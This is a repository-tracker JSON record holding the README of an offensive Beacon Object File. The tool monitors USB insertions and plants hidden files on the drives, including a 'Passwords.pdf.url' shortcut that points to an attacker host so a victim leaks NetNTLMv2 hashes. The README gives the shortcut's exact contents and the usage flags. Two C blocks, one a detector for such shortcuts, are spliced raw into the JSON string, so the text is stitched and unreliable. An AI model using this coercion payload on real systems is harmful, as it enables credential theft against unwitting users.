[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-80566":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":12,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":15,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":14,"compositeScore":16,"rankGlobal":10,"rankLanguage":10,"license":17,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":10,"pushedAt":10,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},80566,"usb-monitor-bof","jakobfriedl\u002Fusb-monitor-bof","jakobfriedl","Async BOF that monitors USB device connect\u002Fdisconnect events, reports device information and performs actions on connected USB storage volumes.","",null,"C",55,6,0,1,43.14,"BSD 3-Clause \"New\" or \"Revised\" License",false,"main",true,[],"2026-06-12 04:01:29","# USB Monitor\n\nAsync BOF that monitors USB device connect\u002Fdisconnect events and reports device information. When a USB drive is connected, it can list directory contents, upload arbitrary files, or place a malicious `.url` file to capture NetNTLMv2 hashes via forced authentication.\n\n>[!Important]\n> This BOF requires asynchronous object file loading capabilities to work without blocking the agent. Such functionality is provided by the [Conquest](https:\u002F\u002Fgithub.com\u002Fjakobfriedl\u002Fconquest\u002F) framework.\n\n## How it works \n\nThe BOF registers two separate `CM_Register_Notification` callbacks via `cfgmgr32`:\n\n1. **USB Device callback** (`USB_DEVICE_GUID`): fires on any USB device arrival\u002Fremoval. 
Parses `VID`\u002F`PID` from the symbolic link path, retrieves the human-readable device description from the registry via `CM_Get_DevNode_Registry_PropertyW`, and prints device info to the beacon.\n\n2. **USB Volume callback** (`VOLUME_GUID`): fires only when a USB storage volume is mounted. Resolves the drive letter by matching `QueryDosDeviceW` targets, retrieves the volume label via `GetVolumeInformationA`, then executes the configured actions (bitmask):\n    - `ACTION_LIST (0x01)`: lists the contents of the USB drive root directory.\n    - `ACTION_PUT (0x02)`: writes the provided file to the USB drive root directory. When a file with the same name exists, it will **not** be overwritten. Optionally sets `FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM` when `--hidden` is passed.\n\nThe agent is woken up from sleep using `BeaconWakeup` whenever a callback is triggered.\n\n## Usage\n\nThe object file takes the following arguments:\n\n| Name | Type | Description |\n| --- | --- | --- |\n| `action` | `int` | Bitmask of actions to execute when a USB drive is mounted.\u003Cbr>- `NONE (0x00)`: monitor only\u003Cbr>- `LIST (0x01)`: enumerate drive root\u003Cbr>- `PUT (0x02)`: write file to drive root\u003Cbr>Flags can be combined (e.g. `0x03` for both listing files and uploading one) |\n| `filename` | `string` | Only used by the `PUT` action. Destination filename on the USB drive. Defaults to the source file's basename, or `Passwords.pdf.url` for the coerce shortcut. |\n| `filecontents` | `bytes` | Only used by the `PUT` action. Raw bytes of the file to write to the USB drive. |\n| `hidden` | `int` | Only used by the `PUT` action. When set to `1`, sets `FILE_ATTRIBUTE_HIDDEN \\| FILE_ATTRIBUTE_SYSTEM` on the written file, which hides it from Explorer under the default folder view settings (hidden and protected operating system files not shown). |\n\nThe repository contains a [Conquest Module](.\u002Fdist\u002Fusb-monitor.py) that simplifies the use of the `usb-monitor` async BOF.
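As an added example (not part of the project's code), the string handling behind the first callback: pulling VID/PID out of the device-interface symbolic link that `CM_Register_Notification` hands to the callback, and recognising the interface class by the GUID suffix of that link. It is plain C with no cfgmgr32 dependency, so it builds and runs on any platform. The sample links and serial number are constructed; the assumption that `USB_DEVICE_GUID` and `VOLUME_GUID` are the standard `GUID_DEVINTERFACE_USB_DEVICE` and `GUID_DEVINTERFACE_VOLUME` class GUIDs is mine, not stated by the project.

```c
/* Added example, not the project's code: extract VID/PID from a
 * device-interface symbolic link and classify the link by its GUID suffix.
 * Pure string handling, no Windows headers required. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed interface-class GUIDs as they appear at the end of the link. */
#define GUID_USB_DEVICE "{a5dcbf10-6530-11d2-901f-00c04fb951ed}"
#define GUID_VOLUME     "{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"

struct usb_ids { unsigned vid, pid; };

/* Case-insensitive prefix match; stops safely at the end of s. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Looks for "<tag>XXXX" (exactly four hex digits followed by a separator
 * or end of string) anywhere in path and stores its value.
 * Returns 0 if the token is absent or malformed. */
static int find_hex_token(const char *path, const char *tag, unsigned *out)
{
    size_t taglen = strlen(tag);
    for (const char *p = path; *p; p++) {
        if (!has_prefix_ci(p, tag))
            continue;
        const char *h = p + taglen;
        unsigned v = 0;
        for (int i = 0; i < 4; i++) {
            if (!isxdigit((unsigned char)h[i]))
                return 0;               /* too short or not hex */
            v = v * 16 + (unsigned)(isdigit((unsigned char)h[i])
                                    ? h[i] - '0'
                                    : tolower((unsigned char)h[i]) - 'a' + 10);
        }
        if (h[4] != '\0' && h[4] != '&' && h[4] != '#' && h[4] != '\\')
            return 0;                   /* more than four digits */
        *out = v;
        return 1;
    }
    return 0;
}

/* Parses "VID_xxxx&PID_xxxx" out of a link such as
 * \\?\USB#VID_0781&PID_5583#<serial>#{guid}. Returns 1 on success. */
int parse_usb_ids(const char *path, struct usb_ids *ids)
{
    return find_hex_token(path, "VID_", &ids->vid) &&
           find_hex_token(path, "PID_", &ids->pid);
}

/* 1 if the symbolic link ends with the given interface-class GUID. */
int has_interface_guid(const char *path, const char *guid)
{
    size_t plen = strlen(path), glen = strlen(guid);
    return plen >= glen && has_prefix_ci(path + plen - glen, guid);
}

int main(void)
{
    /* Constructed sample links: a USB device arrival and a mounted volume.
     * The volume link carries no VID/PID, which is why the BOF resolves the
     * drive letter through QueryDosDeviceW instead. */
    const char *dev = "\\\\?\\USB#VID_0781&PID_5583#4C530001230101234567#" GUID_USB_DEVICE;
    const char *vol = "\\\\?\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_SanDisk&Prod_Cruzer&Rev_1.00#"
                      "4C530001230101234567&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}#" GUID_VOLUME;
    struct usb_ids ids;
    if (parse_usb_ids(dev, &ids))
        printf("device: VID=%04X PID=%04X usb_device_interface=%d\n",
               ids.vid, ids.pid, has_interface_guid(dev, GUID_USB_DEVICE));
    if (!parse_usb_ids(vol, &ids))
        printf("volume: no VID/PID in link, volume_interface=%d\n",
               has_interface_guid(vol, GUID_VOLUME));
    return 0;
}
```

The four-digit check matters: a greedy `strstr` on `VID_` would happily accept a truncated or malformed token and report a bogus vendor ID to the operator.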
\n\n```\nUsage: usb-monitor [--list] [--put file] [--coerce] [--target target] [--name name] [--hidden]\nExample: usb-monitor\n\nOptional arguments:\n  --list                    BOOL       List files and directories on the connected USB drive.\n  --put file                STRING     Path to the file to upload to the connected USB drive.\n  --coerce                  BOOL       Upload a malicious .url file to force NTLM authentication to an attacker-controlled system (requires user interaction).\n                                       Requires --target.\n  --target target           STRING     Hostname or IP address of attacker-controlled system for coercion.\n  --name name               STRING     Name of the uploaded file.\n  --hidden                  BOOL       Hide the uploaded file on the USB drive.\n```\n\nNote that this module includes the `--coerce` flag. This is a wrapper for the `PUT` action that creates and uploads a malicious `.url` file to the root of the connected USB drive. When this option is set, the `--target` flag is required. The uploaded file has the name `Passwords.pdf.url` by default and the following contents:\n\n```ini\n[InternetShortcut]\nURL=file:\u002F\u002F\u003Ctarget>\u002Fshare\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\nIconIndex=11\n```\n\nWhen a victim opens the URL file, Windows tries to reach `\\\\\u003Ctarget>\\share` over SMB (or WebDAV if the client falls back to it) and authenticates to the attacker-controlled system, leaking the NetNTLMv2 response, commonly called the hash, for offline cracking or relaying.\n\n> [!Caution]\n> The URL coercion file is not designed to be stealthy and will raise suspicion when clicked, as it notifies the victim that the destination `\\\\\u003Ctarget>\\share` could not be reached. Consider using zero-click forced authentication exploits that trigger the hash leak automatically when the file explorer opens the USB drive instead of this proof-of-concept.
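The defensive counterpart, as an added example that is not part of the project: a check that parses the body of an Internet Shortcut file and reports the remote host Windows would authenticate to. It looks at `IconFile=` as well as `URL=`, because a UNC icon path is resolved when Explorer renders the listing, which is the zero-click variant the caution above alludes to. The three shortcut bodies are constructed for this example, and `10.10.14.7` stands in for the attacker-controlled target.

```c
/* Added example, not the project's code: flag .url files whose URL= or
 * IconFile= value points at a remote host (UNC or file:// form). */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Case-insensitive string equality for INI keys. */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == '\0' && *b == '\0';
}

/* Case-insensitive prefix match; stops safely at the end of s. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* If value names a remote share ("\\host\share", "//host/share" or
 * "file://host/share"), copies the host into host[] and returns 1.
 * Local paths, http(s) URLs and "file:///C:/..." (empty host) return 0. */
static int remote_host_of(const char *value, char *host, size_t n)
{
    const char *p = value;
    while (*p == ' ' || *p == '\t')
        p++;
    if (has_prefix_ci(p, "file:"))
        p += 5;
    if (!((p[0] == '\\' || p[0] == '/') && (p[1] == '\\' || p[1] == '/')))
        return 0;
    p += 2;
    size_t i = 0;
    while (*p && *p != '\\' && *p != '/' && i + 1 < n)
        host[i++] = *p++;
    host[i] = '\0';
    return i > 0;
}

/* Walks the key=value lines of a .url body (CRLF or LF endings). For the
 * URL= and IconFile= keys the value is inspected; the first remote host
 * found is returned. Returns 0 when the shortcut is entirely local. */
int url_file_remote_host(const char *contents, char *host, size_t n)
{
    const char *line = contents;
    while (*line) {
        const char *end = strpbrk(line, "\r\n");
        size_t len = end ? (size_t)(end - line) : strlen(line);
        char buf[1024];
        if (len >= sizeof buf)
            len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        char *eq = strchr(buf, '=');
        if (eq) {
            *eq = '\0';
            char *key = buf;
            while (*key == ' ' || *key == '\t')
                key++;
            size_t klen = strlen(key);
            while (klen > 0 && (key[klen - 1] == ' ' || key[klen - 1] == '\t'))
                key[--klen] = '\0';
            if ((ieq(key, "URL") || ieq(key, "IconFile")) &&
                remote_host_of(eq + 1, host, n))
                return 1;
        }
        line = end ? end + 1 : line + len;
    }
    return 0;
}

/* Constructed: the coercion shortcut laid out above, URL on the target. */
const char SAMPLE_COERCE[] =
    "[InternetShortcut]\r\n"
    "URL=file://10.10.14.7/share\r\n"
    "IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\n"
    "IconIndex=11\r\n";
/* Constructed: URL harmless, but the icon is fetched from a UNC path. */
const char SAMPLE_ICON[] =
    "[InternetShortcut]\n"
    "URL=https://example.com/\n"
    "IconFile=\\\\10.10.14.7\\share\\icon.ico\n"
    "IconIndex=0\n";
/* Constructed: benign shortcut, local icon and a plain https URL. */
const char SAMPLE_BENIGN[] =
    "[InternetShortcut]\n"
    "URL=https://example.com/\n"
    "IconFile=C:\\Windows\\System32\\SHELL32.dll\n"
    "IconIndex=13\n";

int main(void)
{
    const char *samples[] = { SAMPLE_COERCE, SAMPLE_ICON, SAMPLE_BENIGN };
    for (int i = 0; i < 3; i++) {
        char host[64];
        if (url_file_remote_host(samples[i], host, sizeof host))
            printf("sample %d: remote host %s\n", i, host);
        else
            printf("sample %d: local only\n", i);
    }
    return 0;
}
```

Run it over every `*.url` found on removable media (or at a mount event) and alert on any hit; the file name `Passwords.pdf.url` on its own is a weak signal, the remote host is the reliable one.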
\n\n![USB monitor](.\u002Fassets\u002Fusb-monitor.png)\n\n## Installation\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fjakobfriedl\u002Fusb-monitor-bof\ncd usb-monitor-bof\nmake\n```\n\nFrom there, use Conquest's Script Manager to load the `dist\u002Fusb-monitor.py` module.\n","This project is an asynchronously loaded BOF (Beacon Object File) that monitors USB device connect and disconnect events and reports device information. When a USB drive is connected, it can list directory contents, upload arbitrary files, or drop a malicious `.url` file to capture NetNTLMv2 hashes through forced authentication. Its core functionality uses `CM_Register_Notification` callbacks to watch for USB device and storage volume changes and to run predefined actions such as listing and uploading files. The project suits security-testing scenarios that require real-time USB device monitoring with automatic responses to specific events. Note that the BOF depends on the asynchronous object file loading capability provided by the Conquest framework in order to work.",2,"2026-06-11 04:01:15","CREATED_QUERY"]